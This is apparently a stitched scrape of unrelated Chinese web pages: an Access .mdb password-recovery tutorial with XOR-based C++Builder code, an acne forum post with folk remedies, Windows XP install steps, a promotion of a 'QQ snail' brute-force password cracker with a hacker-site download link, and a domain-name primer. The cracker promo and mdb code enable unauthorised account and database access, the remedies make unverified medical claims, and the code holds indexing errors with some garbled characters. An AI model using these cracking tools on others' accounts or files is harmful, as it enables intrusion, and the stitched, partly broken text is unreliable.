00000060h:B1 33 0C F2 79 5B AA 26 7C 2A 4F E9 7C 99 05 13 ;
为了看的清楚些,我把不同的字节加了颜色。看出门道了吧,Access97以后的版本里,密码字节不再是连续存放,而是隔一个字节存一个。并且经过加密。到于解密的方法嘛,还是用老办法“异或”!0xBE ^ 0x8F = 0x31,这正好是Ascii码"1"哦。下一个0xEC ^ 0xDE = 0x32 正好是Ascii码"2",呵呵。一直到最后一个不同的0x4F ^ 0x7C =0x33,将取得的字符合成字符串,便是密码明文“1234567890123",千万不要以为这样就收工了。因为这一次是正好碰对了。呵呵。我刚开始也以为就这么简单,于是用CB做了个小程序,试着解了几个mdb密码都还行,可是试到动网论坛的mdb文件时发现取出来的密码不对,晕了。于是用另外一个取mdb密码的工具看了一下,发现人家的就可以正确的取出密码,是Access2000的格式,于是感觉微软加密的方式还是没研究完。继续工作,用UltraEdit32打开动网论坛的数据库dvbbs.mdb,和我前面的加过密的数据库做比较,发现不同的地方很多。只好一个字节一个字节的试。。。。nnn次以后发现第0x62处的这个字节起着关键作用,暂称之为加密标志。
db1.mdb //空密码
00000040h:BC 4E BE 68 EC 37 65 D7 9C FA FE CD 28 E6 2B 25 ;
00000050h:8A 60 6C 07 7B 36 CD E1 DF B1 4F 67 13 43 F7 3C ;
00000060h:B1 33 0C F2 79 5B AA 26 7C 2A 4F E9 7C 99 05 13 ;
db2.mdb //密码为:1234567890123
00000040h:BC 4E 8F 68 DE 37 56 D7 A8 FA CB CD 1E E6 1C 25 ;
00000050h:B2 60 55 07 4B 36 FC E1 ED B1 7C 67 13 43 F7 3C ;
00000060h:B1 33 0C F2 79 5B AA 26 7C 2A 4F E9 7C 99 05 13 ;
dvbbs.mdb //密码为:yemeng.net
00000040h:BC 4E DB 6A 89 37 14 D5 F9 FA 8C CF 4F E6 19 27 ;
00000050h:E4 60 15 05 0F 36 D1 E3 DF B1 53 65 13 43 EB 3E ;
00000060h:B1 33 10 F0 79 5B B6 24 7C 2A 4A E0 7C 99 05 13 ;
怎么试呢,还是异或。取0x42处开始的字节0xDB与空密码文件的0x42处字节异或,取0x62处的加密标志与空密码文件0x62处字节异或,然后再把取得的两个值相异或:
(0xDB^0xBE)^(0x10^0x0C)=0x79 嘿嘿。这个值是Ascii的"y",然后取下一个字节(记得隔一个字节取一个)
(0x89^0xEC)^(0x10^0x0C)=0x79 咦,本来这个字节应该是"e"的,怎么变成"y"了?试着不与后面的两个异或值相异或,只计算0x89^0xEC=0x65 得到"e",哈。这下对了。下一个
(0x14^0x65)^(0x10^0C)=0x6D 得到"m",下一个
(0xF9^9C)=0x65 得到"e",注意这里只是这两个数异或。后面的大家可以自己试。
这样就总结出规律来了。
解密时,先取出加密文件从文件头开始0x62处的字节,与空密码数据库文件第0x62处相异或,得到一个加密标志。
再从0x42处开始每隔一个字节取一个字节,取得13个加密后的密码字节,分别与空密码数据库文件0x42处每隔一个字节取得的13个字节想异或,得到13个密码半成品。为什么说是半成品呢,因为还要将13个字节的密码每隔一个字节,就与加密标志相异或,最后得到的13个字节才是真正的密码。当然,如果中间有0x0的字节,则说明密码位数不够13位。直接show出来就可以了。
另外我发现加密标志会随着时间或机器不同而不同,所以也没有万能的,不过有一个参照的就可以了。以下代码是我在写这个程序的时候取得的数,和我写这篇文章不是一个时间,所以数值不一样,但最终解密的结果是一样的。大家可以参考一下。
对了,还有个重要的就是先得判断数据库的版本,我用了个简单的办法,取0x14处的字节,如果为0就判断为是Access97,如果为1就认为是Access2000或2002的。只是目前没有研究出判断2000和2002的办法,如果哪位知道的话,请指点。
代码:
//这里定义的是13个字节作为Access2000异或的源码。与之相对应的加密标志是0x13,ccrun特此注明
//当然你可以用这一组:BE EC 65 9C FE 28 2B 8A 6C 7B CD DF 4F 与这一组相对应的加密标志是0x0c
//呵呵.程序有些乱,希望大家能看的懂。
char PassSource2k[13]={0xa1,0xec,0x7a,0x9c,0xe1,0x28,0x34,0x8a,0x73,0x7b,0xd2,0xdf,0x50};
//Access97的异或源码
char PassSource97[13]={0x86,0xfb,0xec,0x37,0x5d,0x44,0x9c,0xfa,0xc6,0x5e,0x28,0xe6,0x13};
void __fastcall TMainForm::GetMdbPass()
{
char PassStrTemp[26],Ver,EncrypFlag,t1;
int FileHandle;
String MdbPassword,MdbVersion,MdbFileName;
FileHandle=FileOpen(MdbFileName,fmOpenRead);
if(FileHandle<0)
{
ShowMessage("文件打开错误!");
return;
}
//取得数据库版本
FileSeek(FileHandle,0x14,0);
FileRead(FileHandle,&Ver,1);
//取得加密标志
FileSeek(FileHandle,0x62,0);
FileRead(FileHandle,&EncrypFlag,1);
//读取加密后的密码到缓冲区
FileSeek(FileHandle,0x42,0);
FileRead(FileHandle,&PassStrTemp,26);
FileClose(FileHandle);
if(Ver<1)
{
MdbVersion="Access 97";
if(int(PassStrTemp[0]^PassSource97[0])==0)
MdbPassword="密码为空!";
else
{
MdbPassword="";
for(int i=0;i<13;i++)
MdbPassword=MdbPassword+char(PassStrTemp^PassSource97);
}
}
else
{
MdbVersion="Access 2000 or 2002";
MdbPassword="";
for(int i=0;i<13;i++)
{
if(i%2==0)
t1=char(0x13^EncrypFlag^PassStrTemp[i*2]^PassSource2k);
//每隔一个字节就与加密标志相异或。这里的加密标志为0x13
else
t1=char(PassStrTemp[i*2]^PassSource2k);
MdbPassword=MdbPassword+t1;
}
}
if(MdbPassword[1]<0x20||MdbPassword[1]>0x7e)
MdbPassword="密码为空!";
EditMdbFileName->Text=MdbFileName;
EditMdbPassword->Text=MdbPassword;
EditMdbVersion->Text=MdbVersion;
}
转--拿什么来拯救你---我的青春痘
(一)引子
喜欢看海岩的小说,所以连写青春痘的帖子都要借用他的东西,不过我要拯救的是青春痘朋友。其实我已经被别人拯救成功,在感激之余,也想要去拯救下别人了。但又不能太古板教条式地写给大家看,所以用一下午时间写了这篇帖子。如果它的拯救效果理想的话,我接下来会考虑再发一个叫《痘观音》的帖子
(二)战争打响
我的皮肤属于油性皮肤,很多长痘痘的朋友应该都是吧?在十六岁之前,我的皮肤完全可以叫做什么来着?对了,叫吹弹即破。再用成都话来说是巴士的很!但从16岁的花季就开始长痘痘了,我想那应该是青春期到了吧。所以我现在一直都认为我的青春期是从16岁开始的---青春痘是我青春期刻度尺0点。直到21岁零11个月时,青春痘彻底消失了,然后又经过大半年的秘密监控,总结出一个报告:痘痘已经基本绝迹,但还是偶尔会有隐藏极深的出来打下游击---特别是每次在火锅店扫荡之后。不过现在值得庆幸的是,虽然痘不在,但是青春依旧在。五年的时间内,我印象中没有拍出什么敢主动地给朋友们看的相片---不是技术原因,而是因为形象原因。用我表弟同时也是一名战友高强的话来说是---看背影是那么地值得看下去,看正面是那么值得为你哭泣。是的,满脸的痘痘让我在生活中有了本不该有的心理负担。
(三)陷入迷茫
既然长了这样影响大局的皮肤类疾病,而且TNND还哪儿不长,就长在脸上。好象就要让我当一个皮肤科医学临床试验的标本,供大家研究认识什么是典型的青春痘!OK,长了就要治疗啊。于是我便开始病急乱投医了。首先想到的还是医生---还是我妈先想到的。从这点证明老一辈人的思想还是那么值得肯定的。找医生的想法是绝对正确的,而我从不否认这个观点。因为他们代表的是科学,医学科学。但不幸的是我刚开始遇到的医生都是些比我看广告还看的多的医生,尽管TMD都是些大医院的:“你这是青春痘,我确诊!” (妈的,我还知道,要你说。)“用点军献吧,用点……吧”(滚,都是些老子能把说明书背出来的药!)这些庸医就是这样让我对祖国的皮肤科医学水平产生了强烈的怀疑。屡次的医院治疗失败后,我开始从各种渠道收集各种治疗偏方:有什么中医的内服奇药,治好过多少人的;有什么农村的山上刚摘下来的什么药;有什么江湖名医的泡药等等。不过经过多种测试后,结果又让我对我们国家五千年文明发展下来的这些所谓的智慧结晶也产生了质疑,并怀疑古人降子忻挥谐で啻憾坏摹!?/FONT>
(四)执迷不悟
去了屡次医院没有什么作用,江湖郎中的失效,我只有继续寻找好药了。就象当年我们的祖宗神农一样,他是尝百草,没有毒死。而我尝百药,结果差点被气死---因为我的脸慢慢地比我们国家地图还显得那么复杂,用地图形容是因为我一看我国地图就头晕眼花。在我战斗的五年里,互联网,电视杂志等等一切媒体用刘翔的速度在发展,我说的是他的短跑速度,并非讽刺刘翔脸上以前和我一样老火的痘痘。在这些媒体作用下,我接收到的信息也成几何倍数地增长。当然,其中包括治疗青春痘的药品广告。于是,我好象一个刚出监狱获得自由的公民一样,兴奋地接收铺天盖地的各种信息。赵本山在电视上说:不看广告,看疗效!而我是不看疗效,看广告!只要谁的市场营销做的好点,我就买谁的!这产品用了没有效果,OK,打热线质问,热线那头的服务小姐用温柔动听的声音耐心地向你解释:你可能使用的疗程不够,可以再用下我们的产品。或者说:阁下的皮肤有可能不适合我们的产品。我有泪流不出,不是因为那几百元的药钱,而是因为越来越精彩的脸部表现,回头率那时直线上升----因为每个人看了我后都忍不住再看一眼。可能那些比我长相丑很多的人都还为此聊以自慰。传说神农尝了百草后还发明了许多医学上的东西,可我尝试了百药后却毫无收获,反而更加严重。这样的情况从开始一直到我的大学二年级开学。迷茫之中的我开始为以后是否能再找到gf而焦虑,呵呵,尽管我在长痘时也交往过了一个gf,分手的原因我不认为是我的痘痘------虽然许多人都说是。
(五)战痘走上了正确路线
中国有个成语叫,破釜沉舟,还有个不知道应该是成语还是词语的四个字:触底反弹。也许酶运到了头了。人在最落魄时候总会有人拉你一把的。当我又经过一个暑假的无效挣扎后,带着较为沉重的包袱去学校了。行李很沉可以放在的士的后座上,但看到的士右后视镜里面战斗后一片狼籍的战场,心情的沉重就让我觉得行李很轻了。当我正在车里看着镜子发呆的时候,旁边的女司机突然发表了下感叹:小兄弟,你的脸可真厉害!痘长的太严重了!我也只好无奈的表示没有办法。这时,她很有信心地说:我们这儿红十字医院的皮肤科有位医生治这个可厉害了。在当地很有名气的……吹了一大通。我还记得当时我的反映是仿佛遇到了救星,如果不是行李还在车上,我马上要她直接送我去医院。这位大姐是我幸运女神之一。我祝她的出租车以后能换成奔驰。晚上反复考虑了开学第一天就请假的许多借口,但都没有我无言的事实来的有效。第一天上课就请假?对,徐燕,这位其貌不扬但我很喜欢的辅导员用看待不幸遭遇的眼神看着我的脸表示深刻的理解与同情。同意!出学校直接就打个的士到了医院,并非我要表示对出租车司机们的感谢,是因为我们学校那时门口还没有通公交车。
(六)皮肤科王医生
到了红十字医院,挂了号,再向旁边扫地的大婶问了皮肤科怎样走。她应该很熟吧,很连贯地比划如何走,如此这般就到了。我相信她已经被这问题问过至少N次了。到了皮肤科门口。星期一上午,这个时间在我想来应该是上班出勤的高峰,不会有太多人。但事实是我在门口排了近半个小时的队,轮到我了。在我进去之前,我的脸就已经引起了前后许多战友的关注。所以,在我被医生检查的时候,他们也很关注医生给我的诊断报告----他们肯定认为如果医生说我的能治好,那么他们就不用担心自己的了。
医生姓王,王容----是这医院皮肤科唯一的医生。后来听说本来还有位更老的医生,技术更好,是这王医生的老师级别人物,不过几个月前刚去世。听了后除了感叹天妒英才外,也后悔自己为什么不早点打听到这里。第一眼看到王医生觉得她和我妈年龄相当,后来和她熟悉后也证明了我的判断---尽管我妈看起来比她要显得年轻的多。这个问题也是我心中唯一的对王医生的疑问:为什么你搞皮肤科学的,还没有我搞财务的妈妈皮肤来的年轻?呵呵,我不敢当面挑战她的权威。不过她的皮肤也很健康,很光滑,细致的几乎看上去没有毛孔,只是多了些皱纹吧。后来才知道她从来不用任何化妆品洗面奶的。她说话除了在专业上保持严厉的权威感外,其他时候还是很温和。她给我的第一印象就是这样的。话题扯远了点,言归正传。经过诊断后,王医生用比较专业的解释让我佩服地五体投地----由于乱用药品化妆品而导致什么什么的,从而什么什么的。分析的很有道理,I 服了 her.然后,她并不急着给我治疗什么的。就给我两小瓶药水,让我搽几天再来,顺便嘱咐了很关键一点-----禁止再用任何的东西搽洗脸!就洗温水。
(七)关于治疗
过了几天我迫不及待地又去了。这次她开始解释为什么上次不马上给我治疗。我的皮肤组织当时是已经受到严重损害被各种药品里的化学成分。所以让我用清水洗脸和她兑的无副作用的消炎药水恢复一下。今天可以开始给我做手术了。我听说手术,顿了一下,痘痘也要手术? 王阿姨,怎么做啊?我已经开始叫她阿姨了,这样拉近点距离也许她下手时会轻点点。但后来我的神经系统告诉我她并不明白我叫阿姨的意思。原来所谓的手术就是睡在她专用的皮肤科手术床上用专用的挑痘痘和脓疮的手术刀,再加上她恰倒好处专业的熟练手法,将有脓疮的痘疮挑干净。
我第一次接受这样正规的治疗。感觉如何?生孩子有多痛我不知道。我是男人嘛。据说生了一次就不想生第二次是许多女人的想法。但是挑痘包时的痛苦,也让我有不想再挑第二次的念头。那叫疼!你知道一刀一刀地挑你脸上的肉是什么感觉?可以马上试一下,如果你旁边刚好有刀的话。王阿姨好象对我疼叫声早有预料,并不感到以外。还是一下一下地对我的脸部进行改造,再长出新的肌肤。如果可以用老城区改造来形容也可以,推掉老房子,修新的小区。正当我准备接受下一刀时,王阿姨停了,我可以看到她也蛮辛苦的----额头上有汗了。
她的治疗观点是第一次只给我挑局部一些就好了,挑多了的话皮肤会受不了,而且也不容易恢复。我感谢她的这样专业的做法,我其实很早就想她能停了。而且她每个礼拜只让我去一次接受手术。虽然,去的越多她收入会越多。这一点也是我更敬佩她的地方。第一次手术挑了半张脸的豆豆,然后给我用她的药水洗干净脸上的血水?我反正感觉是。然后,开了内服药,也就几元钱的普通消炎药。主要是皮肤被破坏得消炎。并非治疗豆豆的药。还有开了两瓶她自己兑的药水,很小很小两个瓶子,黄色瓶子是用来每天搽做了手术的皮肤。消炎作用,透明瓶子药水的作用是去印的作用。十元钱两瓶。就这样简单的方法!其他什么都不用,走时,还叮嘱三遍千万禁止用任何东西搽脸洗脸了,什么药也不用吃了。第一次下来就三十元钱一共花了。
就这样每个礼拜去一次,刚开始几个礼拜都是挑了地方又会长出来,她说很正常,慢慢就没有了。后来事实也是如此。严重时每次最多就30元的费用,后来一二十元就行了。看各种情况。每礼拜一次她那里是我那学期坚持做了的事情。结果期末的时候,豆豆基本不长了。剩下的只是豆印了,红色的。
(八)关于痘印
对于痘痕和痘印她也有自己的经验和看法,认为根本没有什么药物能去印!不符合皮肤科学的,药物去印。所以她要求我还是坚持用清水洗脸,然后再用下她兑的透明的药水,有去印记的功能的,也就几元一瓶。在治疗豆豆和印记时间内,她只给我开了两种辅助药物,一个是维生素c还有就是维生素E。对于皮肤有好处。可以在医生指导下吃点。还有其他辅助治疗,就是在她那里做了为数不多的几次倒膜,效果不是很明显。但她也不要求我做了。就让我慢慢恢复,注意多吃点蔬菜,多喝水这样的嘱咐挺多。
(九)关于饮食
很多战友都认为战斗期间不能吃这样那样的。或许也是个误区。王阿姨的观点让我觉得很受用-----年轻人,不要担心这样的问题,想吃就吃,有个度就行了,青春痘和食物没有太多的干系,吃食物上的火长出来的不是正中的豆豆,热疮而已,所以烧烤什么的我也无所畏惧了。事实证明也没有什么关系。所以现在许多战友的心理也许我和以前的心理有着雷同,就是忌这样那样的食物,结果是没有享受到反而还是在长豆豆,不是吗?
(十)关于后期恢复
我喜欢运动,特别是本人坚持每天早上起床跑步的习惯对痘痘治疗和恢复都有着很好的辅助作用。医生的看法是运动出汗有利于排毒,对于治疗青春痘和祛除痘印都有好处。我常常运动的结果是---人健康有精神,痘痘也更少。多吃点水果,多喝水,多运动,休息好,生活规律,心情开朗,只要这几点做好了就应该可以取得最后的战痘成功。
(十一)后记
我刚成功应聘到了一个企业工作,倘若脸上还是那么惨的话,我不敢想象面试时那几个招聘官会选择我到这个比较注重形象的部门。我能深刻理解战友们的痛苦,那是耶苏也无法理解的痛苦---如果耶苏不长豆豆的话。写下这样的一个帖子,希望能与战友们分享战痘胜利的好心情,也希望通过此帖让大家 不要重蹈我的覆辙。最后,祝还在战斗中的朋友们找到正确治疗方法,早日恢复美丽容颜。
1、减少粉刺之果菜汁
(a)制作原料
小白菜、荷兰芹、青辣椒、柠檬、苹果、绿豆。
(b)制作方法
(1)将小白菜、荷兰芹、柠檬、苹果搅汁备用。
(2)青辣椒搅汁备用。
(3)将(1)加(2)即可饮用。
(c)外敷的方法
(1)豆腐搅成豆腐渣。
(2)绿豆煮软,过滤备用。
(3)以丝瓜露清洁全脸。
(4)用蔬菜磨砂膏加蜜乳按摩霜做磨砂。
(5)以芦荟按摩霜按摩全脸。
(6)用去角质层水搽于患处,待干,用肥皂搓成泡沫,推掉角质层。
(7)以菜汁做果菜按摩法。
(8)将化学盐水倒入美颜蒸脸5-10分钟,以洁肤针挑挤污垢。
(9)同时可用蛋白质粉调水搽于患处,贴上纸巾,待10-15分钟,把它拉出,然后用纱布包豆腐沾特效粉按摩。
(10)将绿豆渣加入豆腐渣,再加入蛋白质倒膜粉调匀敷在脸上约15-20分钟。
(11)250克冰糖加750毫升左右的水烧开,温服,2~3天1次。一般服6~7次便可自愈了。在服冰糖水期间,有时症状会加重,但过1~2天会慢慢自行退去。
(12)大枣10粒,芹菜100克,煮汤经常服用。
(13)绿豆粉煮成糊状,晚睡前洗净患部。涂上此糊,坚持2星期,粉刺便会慢慢隐去。
(14)用15克盐水冲洗患部,每天1~2次。此方对粉刺初期尤为有效,2~3天便可抑制粉刺的生成。
(15)每天洗脸不少于4次,尤其是睡前,洗时用温水和香皂,然后用柑桔的皮汁或肉(越酸越好)擦患部。
(16)大半面盆热水,屏气将脸置于盆口,四周以湿毛巾围严,蒸汽浴面。这样重复几次,然后用温水洗脸。每周2~3次,使面部毛孔经常保持通畅,一般两周见效。
(17)在患部涂上鱼肝油,晚上睡前再以液状维生素E涂于患部,可痊愈粉刺的瘢痕。
(18)将脸彻底洗净,用酒精消毒患部,也能取到消除粉刺的效果。
(19)常用温开水、硫磺香皂洗脸,是消除粉刺最简单的妙方。
(20)鲜牛奶半杯煮沸,待其温热后以棉花蘸湿,轻搽于脸上,片刻后,牛奶渗入毛孔,软化黑头粉刺,再用清水洗去,然后轻轻将粉刺头挤出。牛奶中可加入少量植物油,这样能较快地清除粉刺且不留有斑迹。
(21)苦杏仁数枚碾成细粉,加鸡蛋清调成糊状,晚间涂搽,次日晨洗去。
(22)取等份肥皂和益母草灰捣烂成泥状,洗面后涂擦患处,每日3次。
(23)每日早晚用淘米水洗脸,约两星期,粉刺就会消失。严重粉刺患者,用此法3个月,也能收到成效。
(24)每日清晨饮服淡盐水1杯(每杯水中加盐花10余粒便够了)。此方简便省时,长期使用,疗效较好。
2、预防暗疮之果菜汁
(a)制作原料
荷兰芹、油菜、苦瓜、橙、酸牛奶、芦荟。
(b)制作方法
(1)将荷兰芹、油菜、苦瓜、橙搅成汁饮用。
(2)将酸牛奶加入搅好的果菜汁饮用。
3、苦瓜渣留着做面膜
(c)外敷的方法
(1)薏仁泡水待蒸脸用。
(2)豆腐搅成豆腐渣备用。
(3)将新鲜芦荟洗干净,去掉表皮,刮出其透明汁液,掺入苦瓜渣内做面膜。
(4)先以丝瓜露或红药水清洁全脸。
(5)用苦瓜汁做果菜按摩,再以维他命C和芦荟按摩霜按摩全脸。
(6)将消炎水和薏仁水混入后美颜蒸脸5~10分钟,以洁肤污垢,然后用纱布包豆腐沾特效粉按摩全脸。
(7)将苦瓜渣加入豆腐渣,再加入蛋白质倒膜粉调匀敷在脸上约20分钟。
3、消除凹洞疤痕之果菜汁。
(a)制作原料
花椰菜、荷兰菜、枸杞菜、南瓜、芋头、芦荟、海带、香菇。
(b)制作方法
(1)花椰菜、荷兰芹、枸杞菜搅汁饮用。
(2)菜渣留着做面膜。
(c)外敷的方法
(1)香菇泡水或海带泡水待蒸脸用。
(2)南瓜加水熬半个钟头,即成熟软南瓜,待凉做面膜。
(3)芋头搅汁待用;芋头渣待做面膜。
(4)将芦荟洗干净,去掉表皮,刮出其透明汁液渗入菜渣内做面膜。
(5)以丝瓜露清洁全脸。
(6)用蔬菜磨砂膏加草莓按摩霜做磨砂。
(7)用芦荟按摩霜加草莓按摩霜按摩全脸。
(8)用芋头汁以果菜按摩法按摩全脸(注:眼睛与嘴巴不可按摩)。
有人说 用美国绿色化妆品粉刺克星---青春无痘
(9)把香菇水和海带水倒入美颜蒸脸机蒸脸约5分钟,以洁肤针挑挤出污垢,然后用纱布包豆腐沾特效粉按摩全脸。
(10)将蛋白质粉加入菜渣、南瓜和芋头渣调匀敷在脸上约15分钟。
1. 将 Windows XP CD 插入到 CD/DVD 驱动器中(或将第一张 Windows XP 安装启动盘插入到软盘驱动器中),然后重新启动计算机。
注意:要从 Windows XP CD(或从安装启动盘)启动计算机,必须将计算机配置为从 CD/DVD 驱动器(或软盘驱动器)启动。在某些情况下,您可能必须修改计算机的 BIOS 设置。有关详细信息,请参阅将计算机配置为从 CD 启动。
2. 如果要从 Windows XP CD 启动计算机,那么请在得到提示时按任一键从 CD 启动。如果要从 Windows XP 安装启动盘启动,那么请在得到提示时依次插入其他磁盘,并在插入每张磁盘后按 Enter 继续。
3. 在“欢迎使用安装程序”页面上,按 Enter 继续。
4. 在“许可协议”页面上,阅读协议,并按照其中的说明接受或拒绝协议。
5. 如果检测到现有的 Windows XP 安装,那么系统将提示您对其进行修复。按 Esc(不进行修复)。
6. 每个物理硬盘上的所有现有分区和未分区空间都将被列出。使用箭头键选择分区或要在其上创建新分区的未分区空间,然后按 D 删除现有的分区,或按 C 使用未分区空间创建新分区。
如果按 D 删除现有的分区,那么必须接着按 L(如果是系统分区,则按 Enter,然后按 L),以确认要删除该分区。对于要用作新分区的每个现有的分区,重复此过程。当所有的分区都被删除时,选择生成的未分区空间,然后按 C 创建新分区。
注意:如果希望在已经存在一个或多个分区的位置上创建分区,那么必须首先删除现有分区,然后再创建新分区。7. 键入要用于新分区的大小(用 MB 表示),然后按 Enter;或者直接按 Enter,以使用最大大小创建分区。8. 如果要创建其他分区,请重复第 6 步到第 7 步。
9. 如果要安装 Windows XP,请使用箭头键选择要在其中安装 Windows XP 的分区,然后按 Enter。如果您不希望格式化该分区和安装 Windows XP,请按 F3 两次退出安装,然后不要继续执行后面的步骤。在这种情况下,必须使用其他程序来格式化分区。
10. 选择要用于该分区的格式化选项,然后按 Enter。选项为:* 使用 NTFS 文件系统格式化分区(快速)* 使用 FAT 文件系统格式化分区(快速)* 使用 NTFS 文件系统格式化分区* 使用 FAT 文件系统格式化分区* 保留当前文件系统不变(无更改)
对于大多数配置,NTFS 是实现安全性和灵活性的绝佳选择。但是,如果您打算安装多重引导配置,并访问使用旧操作系统(如 Windows 95、Windows 98 或 Windows Millennium Edition)的驱动器上的数据,那么请选择 FAT。
当您格式化某个卷时,该卷上的文件将被删除,并且硬盘将经过扫描以查看是否存在坏扇区。在对卷进行格式化时,大部分时间都用在扫描磁盘上。如果您选择“快速”格式化选项,那么该分区上的文件将被删除,但是磁盘将不会经过检查坏扇区的扫描。只有在以前曾经格式化过该硬盘,并且您确信该硬盘未损坏时,才应使用此选项。
注意:在 Windows XP 安装过程中,如果所选分区是新分区,那么“保持现有文件系统”选项将不可用。对于大小小于或等于 2 GB 的分区,安装程序使用 FAT(又被称作 FAT16)文件系统。对于超过 2 GB 但是小于 32 GB 的分区,安装程序使用 FAT32 文件系统。对于超过 32 GB 的分区,安装程序使用 NTFS。
注意:如果您已经删除并创建了一个新系统分区,但是要在另一个分区上安装 Windows XP,那么此时将提示您同时为系统分区和启动分区选择文件系统。
11. 在安装程序格式化该分区之后,按照屏幕上的说明继续安装。在安装完成之后,可以使用 Windows XP 中的磁盘管理工具创建或格式化其他分区。
执行其他与安装有关的任务 如何从命令提示符安装 Windows?
如果您的计算机不从 CD 启动,那么仍可以使用 Windows XP 安装软盘启动安装程序。在安装过程中,系统将提示您插入 Windows XP CD。有关详细信息,请参阅“创建启动盘”。
另外,可以使用 Windows 98 或 Windows Millennium Edition 启动盘启动计算机,然后运行 Windows XP CD 上 i386 文件夹中的 Winnt.exe。
1. Smartdrv.exe 工具可以加速将文件从 CD 复制到硬盘驱动器的过程。要使用 Smartdrv.exe 工具,请确保 Smartdrv.exe 文件位于启动盘上。
如果没有 Smartdrv.exe,那么文件复制过程所需的时间会长得多,但是仍能成功完成。请验证下列各项是否存在于启动盘上的以下文件中;如果尚不存在,请添加进去:
在 Autoexec.bat 中,添加下面一行:
smartdrv.exe
在 Config.sys 中,添加下面一行:
device=himem.sys
注意:有关修改 Config.sys 和 Autoexec.bat 文件的信息,请参阅 Microsoft 知识库文章 232558。2. 将启动盘插入到计算机的软盘驱动器中,然后重新启动计算机。3. 在出现 DOS 提示符(类似 C:>)时,键入以下各行,在每一行后面都按 Enter。用您的 CD-ROM 驱动器的驱动器号替换字母 D(如果二者不同的话)。
D:
cd \i386
winnt
在安装开始时,按照屏幕上的提示操作。
软件介绍 QQ蜗牛暴力破解+动画教程 下载
需要软件 QQ蜗牛暴力 qqsnal.exe
字典生成 提供个下载地址:http://www.chinesehack.org/down/show.asp?id=2533
要注意几点
一开始破的时候要关了全部的QQ
二开始破的时候不可以搞别的东西的.
先生成字典
生成三位的密码.纯数字的.
密码长度自己可以设置.不过太长空间要很大
下载联接==>>
网站建设基础:域名知识大全总结
1.什么是域名?
从技术上讲,域名只是一个Internet中用于解决地址对应问题的一种方法。可以说只是一个技术名词。但是,由于Internet已经成为了全世界人的Internet,域名也自然地成为了一个社会科学名词。
从社会科学的角度看,域名已成为了Internet文化的组成部分。
从商界看,域名已被誉为”企业的网上商标”。没有一家企业不重视自己产品的标识--商标,而域名的重要性和其价值,也已经被全世界的企业所认识。1998年3月一个月内,世界上注册了179,331个通用顶级域名(据精品网络有关资料),平均每天注册5977个域名,每分钟25个!这个记录正在以每月7%的速度增长。中国国内域名注册的数量,从96年底之前累计的300多个,至98年11月猛增到的16644个,每月增长速度为10%。
2.为什么要注册域名?
Internet这个信息时代的宠儿,已经走出了襁褓,为越来越多的人所认识,电子商务、网上销售、网络广告已成为商界关注的热点。”上网”已成为不少人的口头禅。但是,要想在网上建立服务器发布信息,则必须首先注册自己的域名,只有有了自己的域名才能让别人访问到自己。所以,域名注册是在互联网上建立任何服务的基础。同时,由于域名的唯一性,尽早注册又是十分必要的。
为什么没注上域名比商标被抢注更头痛?
由于域名和商标都在各自的范畴内具有唯一性,并且,随着Internet的发展,从企业树立形象的角度看,域名又从某种意义上讲,和商标着潜移默化的联系。所以,它与商标有一定的共同特点。许多企业在选择域名时,往往希望用和自己企业商标一致的域名。但是,域名和商标相比又具有更强的唯一性。举个例子:同样持有Panda注册商标的某电子集团公司和某日化厂之间出现过域名注册中的冲突,按照《中国互联网络域名注册暂行管理办法》规定,两家公司都有权以panda为域名注册,但是panda.xxx.cn只有一个,那么,在域名申请都符合《中国互联网络域名注册暂行管理办法》规定的情况下,精品网络按先来先注册的原则处理申请。某日化厂先申请了panda.xxx.cn,而某电子集团公司在某日化厂已注册成功,并且网站已经开通后,才提交panda.xxx.cn域名的申请,其结果是某电子集团公司已经无法以panda.xxx.cn作为自己的域名了。
3.域名与商标的关系
从商业角度来看,域名是”企业的网上商标”。企业都非常重视自己的商标,而作为网上商标的域名,其重要性和其价值也已被全世界的企业所认识。域名和商标都在各自的范畴内具有唯一性,并且随着Internet的发展。从企业树立形象的角度看,域名和商标有着潜移默化的联系。所以,域名与商标有一定的共同特点。许多企业在选择域名时,往往希望用和自己企业商标一致的域名。但是,域名和商标相比又具有更强的唯一性。
从域名价值角度来看,域名是互联网上最基础的东西,也是一个稀有的全球资源,无论是做ICP和电子商务,还是在网上开展其它活动,都要从域名开始,一个名正言顺和易于宣传推广的域名是互联网企业和网站成功的第一步。
4.域名的管理机构
在中国域名注册通常分为国内域名注册和国际域名注册。
目前,国内域名注册统一由中国互联网络信息中心---CNNIC进行管理,具体注册工作由通过CNNIC认证授权的各代理商执行。而国际域名注册现在是由一个来自多国私营部门人员组成的非盈利性民间机构---国际域名管理中心Internet Corporation for Assigned Names and Numbers(ICANN)统一管理,具体注册工作也是由通过ICANN授权认证的各代理商执行。
5.域名解析必读?
尊敬的中法网用户:
您们好,由于上级网络提供商发生变化,我司已对原部分IP地址进行调整,请域名不在我司 注册的客户尽快按以下方法重新做域名解析:
1、首先删除域名原有A记录及MX记录
2、增加域名本身CNAME记录指向到 A01.xunnet.com
3、增加域名www记录CNAME指向到 A01.xunnet.com
4、增加域名FTP记录CNAME指向到 A01.xunnet.com
5、增加域名mail记录CNAME指向到 mx.data168.com
6、增加域名本身MX记录到: mx.data168.com
7、如果您只是企业邮局用户只需操作第1、5、6步即可
8、如您的域名不支持CNAME功能,请点击此处联系我们
6.顶级、二级、三级域名的区别
一个完整的域名由二个或二个以上部分组成,各部分之间用英文的句号”.”来分隔,最后一个”.”的右边部分称为顶级域名(TLD,也称为一级域名),最后一个”.”的左边部分称为二级域名(SLD),二级域名的左边部分称为三级域名,以此类推,每一级的域名控制它下一级域名的分配。
域名的构成
顶级域名:一个域名由两个以上的词段构成,最右边的就是顶级域名。
目前,国际上出现的顶级域名有.com,.net,.org,.gov,.edu,.mil,.cc,.to,.tv以及国家或地区的代码,其中最通用的是.com,.net,.org
.COM - -适用于商业实体,它是最流行的顶级域名,任何人都可注册一个.com域名。
.NET - -最初用于网络机构如ISP,今天,任何一个人都可注册一个.net域名。
.ORG ---设计是用于各类组织机构,包括非盈利团体,今天,任何一个人都可注册一个.org域名。 国家代码:像cn(中国),fr(法国)和au(澳大利亚)这样两个字母的域名谓之国家代码顶级域名(ccTLDs),通过ccTLDs,基本上可以辨明域名持有者的国家或地区。详细的国家代码可在www.icann.org查找。
二级域名:靠左边的部分就是所谓的二级域名,在cctv.com中,cctv就是顶级域名.com下的二级域名,cctv.com还可以有mail.cctv.com的形式,这里的mail可以谓之”主机”或”子域名”。
如何取自己喜欢的域名以及注册域名应注意的一些问题
一个好的域名是成功的开始,当您要注册一个新的域名时,请记住下列域名命名原则:
a) 容易记这是最重要的原则。
